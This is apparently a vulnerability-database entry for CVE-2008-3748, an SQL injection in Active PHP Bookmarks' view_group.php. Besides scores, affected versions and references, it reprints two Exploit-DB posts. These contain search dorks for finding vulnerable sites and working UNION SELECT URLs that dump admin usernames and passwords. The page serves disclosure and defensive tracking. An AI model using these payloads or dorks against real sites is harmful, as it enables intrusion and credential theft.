CVE-2008-3748
Published: 2008-08-21
Priority: P3 (40) | Severity: high | CVSS 2.0: 7.5
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 1.01% (58.8th percentile)
SQL injection vulnerability in view_group.php in Active PHP Bookmarks (APB) 1.1.02 and 1.2.06 allows remote attackers to execute arbitrary SQL commands via the id parameter.
Affected
4 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| lbstone | active_php_bookmarks | — | — |
| lbstone | active_php_bookmarks | — | — |
| lbstone | apb | — | — |
| lbstone | apb | — | — |
No detection rules found.
Exploit-DB
Active PHP BookMarks 1.3 - SQL Injection
exploitdb·2009-12-22
---
# Title: Active PHP Bookmarks v1.3 Remote SQL Injection Vulnerability
# EDB-ID: ()
# CVE-ID: ()
# OSVDB-ID: ()
# Author: Mr.Elgaarh
# Published: 2009-12-21
~ Author : Mr.Elgaarh
~ Email : [email protected]
~ Home : http://securityreason.com/
Dork : "Powered by Active PHP Bookmarks v1.3" inurl:.view_group.php?id=
./Exploit:
first search for the admin username :
ex : http://server/path/view_group.php?id=-4
ex : http://[Target.com]/path/view_group.php?id=-4+union+select+0,1,concat(username,0x3a,password),3,4,5,6,7+from+apb_users--
admin panel path : http://server/path/cookie_auth.php?action=cookie_login
Greets : Mado - Dr.Hacker - Mr.Max - broken proxy - Offensive Security - AG-Spider - ISlamic Defenders Crew -
Exploit-DB
Active PHP BookMarks 1.1.02 - SQL Injection
exploitdb·2008-08-19
---
|___________________________________________________|
|
| Bookmarks V 1.1.02 (id) Remote SQL Injection Vulnerability
|
|___________________________________________________
|---------------------Hussin X----------------------|
|
| Author: Hussin X
|
| Home : www.tryag.cc/cc
|
| email: darkangel_g85[at]Yahoo[DoT]com
|
|___________________________________________________
| |
|
| script : http://lbstone.com/apb/?version=1.1.02
|
| DorK : Powered by Active PHP Bookmarks v1.1.02
|
| DorK : inurl:bookmarks/view_group.php?id=
|___________________________________________________|
Exploit:
www.[target].com/Script/view_group.php?id=-1+union+select+1,2,concat_ws(0x3a,username,password),4,5,6,7,8+from+apb_users--
____________________________( Greet
No writeups or analysis indexed.
References:
http://secunia.com/advisories/31544
http://securityreason.com/securityalert/4174
http://www.securityfocus.com/bid/30757
https://exchange.xforce.ibmcloud.com/vulnerabilities/44548
https://www.exploit-db.com/exploits/6277
Published: 2008-08-21